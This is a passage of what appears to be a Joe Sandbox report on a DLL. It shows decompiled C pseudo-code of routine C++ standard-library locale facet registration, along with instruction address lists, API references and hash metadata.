																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E206FD3(__eflags, _t722);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e2c6df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E206FD3(__eflags, _t721);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e2c6dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E206FD3(__eflags, _t720);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e2c6df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E206FD3(__eflags, _t719);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e2c6dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E206FD3(__eflags, _t718);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e2c6dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E206FD3(__eflags, _t717);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e2c6db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

0x6e20f229
0x6e20f229
0x6e20f230
0x6e20f23a
0x6e20f23f
0x6e20f24a
0x6e20f24e
0x6e20f251
0x6e20f256
0x6e20f25a
0x6e20f25f
0x6e20f263
0x6e20f2a8
0x6e20f2ab
0x6e20f2b7
0x6e20f265
0x6e20f267
0x6e20f26d
0x6e20f273
0x6e20f27b
0x6e20f27e
0x6e20f2bb
0x6e20f2c9
0x6e20f2ce
0x6e20f2d6
0x6e20f2e0
0x6e20f2e5
0x6e20f2f0
0x6e20f2f4
0x6e20f2f7
0x6e20f2fc
0x6e20f305
0x6e20f307
0x6e20f309
0x6e20f34e
0x6e20f351
0x6e20f35d
0x6e20f30b
0x6e20f30b
0x6e20f30d
0x6e20f313
0x6e20f319
0x6e20f321
0x6e20f324
0x6e20f361
0x6e20f36f
0x6e20f374
0x6e20f37c
0x6e20f386
0x6e20f38b
0x6e20f396
0x6e20f39a
0x6e20f39d
0x6e20f3a2
0x6e20f3ab
0x6e20f3ad
0x6e20f3af
0x6e20f3f4
0x6e20f3f7
0x6e20f403
0x6e20f3b1
0x6e20f3b1
0x6e20f3b3
0x6e20f3b9
0x6e20f3bf
0x6e20f3c7
0x6e20f3ca
0x6e20f407
0x6e20f415
0x6e20f41a
0x6e20f422
0x6e20f42c
0x6e20f431
0x6e20f43c
0x6e20f440
0x6e20f443
0x6e20f448
0x6e20f451
0x6e20f453
0x6e20f455
0x6e20f49a
0x6e20f49d
0x6e20f4a9
0x6e20f457
0x6e20f457
0x6e20f459
0x6e20f45f
0x6e20f465
0x6e20f46d
0x6e20f470
0x6e20f4ad
0x6e20f4bb
0x6e20f4c0
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f7
0x6e20f4f9
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff
0x6e20f472
0x6e20f472
0x6e20f475
0x6e20f479
0x6e20f47d
0x6e20f48a
0x6e20f492
0x6e20f494
0x00000000
0x6e20f494
0x6e20f45b
0x6e20f45b
0x00000000
0x6e20f45b
0x6e20f459
0x6e20f3cc
0x6e20f3cc
0x6e20f3cf
0x6e20f3d3
0x6e20f3d7
0x6e20f3e4
0x6e20f3ec
0x6e20f3ee
0x00000000
0x6e20f3ee
0x6e20f3b5
0x6e20f3b5
0x00000000
0x6e20f3b5
0x6e20f3b3
0x6e20f326
0x6e20f326
0x6e20f329
0x6e20f32d
0x6e20f331
0x6e20f33e
0x6e20f346
0x6e20f348
0x00000000
0x6e20f348
0x6e20f30f
0x6e20f30f
0x00000000
0x6e20f30f
0x6e20f30d
0x6e20f280
0x6e20f280
0x6e20f283
0x6e20f287
0x6e20f28b
0x6e20f298
0x6e20f2a0
0x6e20f2a2
0x00000000
0x6e20f2a2
0x6e20f269
0x6e20f269
0x00000000
0x6e20f269
0x6e20f267

APIs

__EH_prolog3.LIBCMT ref: 6E20F230
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F23A
int.LIBCPMT ref: 6E20F251

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

messages.LIBCPMT ref: 6E20F274
std::_Facet_Register.LIBCPMT ref: 6E20F28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F2C9

Strings

lm,n, xrefs: 6E20F245

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lm,n
API String ID: 438560357-2206263333
Opcode ID: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
Instruction ID: 1c104a9268f021b353bb8231c8ab20f96f0e8e10f81fcfdd2560fc16708d8229
Opcode Fuzzy Hash: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
Instruction Fuzzy Hash: 5F11067990051E8FCF00DBE0C894AEEB77BAF84B15F240908E4206B3D0DF749A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t902 - 0x14, 0);
				_t861 =  *0x6e2c6db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1E161C(0x6e2c6d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E2066BA(_t902 - 0x14);
					return E6E220075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E210DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t902 - 0x20);
							E6E223D74(_t902 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t840, _t861, 0x14);
							E6E206653(_t902 - 0x14, 0);
							_t862 =  *0x6e2c6dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1E161C(0x6e2c6b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E2066BA(_t902 - 0x14);
								return E6E220075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E210E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t902 - 0x20);
										E6E223D74(_t902 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t637, _t841, _t862, 0x14);
										E6E206653(_t902 - 0x14, 0);
										_t863 =  *0x6e2c6de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1E161C(0x6e2c6d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E2066BA(_t902 - 0x14);
											return E6E220075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E210EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t902 - 0x20);
													E6E223D74(_t902 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t637, _t842, _t863, 0x14);
													E6E206653(_t902 - 0x14, 0);
													_t864 =  *0x6e2c6db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1E161C(0x6e2c6d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E2066BA(_t902 - 0x14);
														return E6E220075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E210F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t902 - 0x20);
																E6E223D74(_t902 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t637, _t843, _t864, 0x14);
																E6E206653(_t902 - 0x14, 0);
																_t865 =  *0x6e2c6dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1E161C(0x6e2c6d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E2066BA(_t902 - 0x14);
																	return E6E220075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E210F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t902 - 0x20);
																			E6E223D74(_t902 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t637, _t844, _t865, 0x14);
																			E6E206653(_t902 - 0x14, 0);
																			_t866 =  *0x6e2c6dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1E161C(0x6e2c6d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E2066BA(_t902 - 0x14);
																				return E6E220075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E210FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t902 - 0x20);
																						E6E223D74(_t902 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t637, _t845, _t866, 0x14);
																						E6E206653(_t902 - 0x14, 0);
																						_t867 =  *0x6e2c6df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1E161C(0x6e2c6d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E2066BA(_t902 - 0x14);
																							return E6E220075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E211057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t902 - 0x20);
																									E6E223D74(_t902 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t637, _t846, _t867, 0x14);
																									E6E206653(_t902 - 0x14, 0);
																									_t868 =  *0x6e2c6dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1E161C(0x6e2c6d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E2066BA(_t902 - 0x14);
																										return E6E220075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E2110BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t902 - 0x20);
																												E6E223D74(_t902 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t637, _t847, _t868, 0x14);
																												E6E206653(_t902 - 0x14, 0);
																												_t869 =  *0x6e2c6df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1E161C(0x6e2c6da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E2066BA(_t902 - 0x14);
																													return E6E220075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E211127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t902 - 0x20);
																															E6E223D74(_t902 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t637, _t848, _t869, 0x14);
																															E6E206653(_t902 - 0x14, 0);
																															_t870 =  *0x6e2c6df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1E161C(0x6e2c6da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E2066BA(_t902 - 0x14);
																																return E6E220075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E2111AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t902 - 0x20);
																																		E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t637, _t849, _t870, 0x14);
																																		E6E206653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e2c6dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1E161C(0x6e2c6d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6E2066BA(_t902 - 0x14);
																																			return E6E220075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6E211230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t902 - 0x20);
																																					E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t637, _t850, _t871, 0x14);
																																					E6E206653(_t902 - 0x14, 0);
																																					_t872 =  *0x6e2c6dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6E1E161C(0x6e2c6d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6E2066BA(_t902 - 0x14);
																																						return E6E220075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6E2112B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t902 - 0x20);
																																								E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t637, _t851, _t872, 0x14);
																																								E6E206653(_t902 - 0x14, 0);
																																								_t873 =  *0x6e2c6dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6E1E161C(0x6e2c6d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6E2066BA(_t902 - 0x14);
																																									return E6E220075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
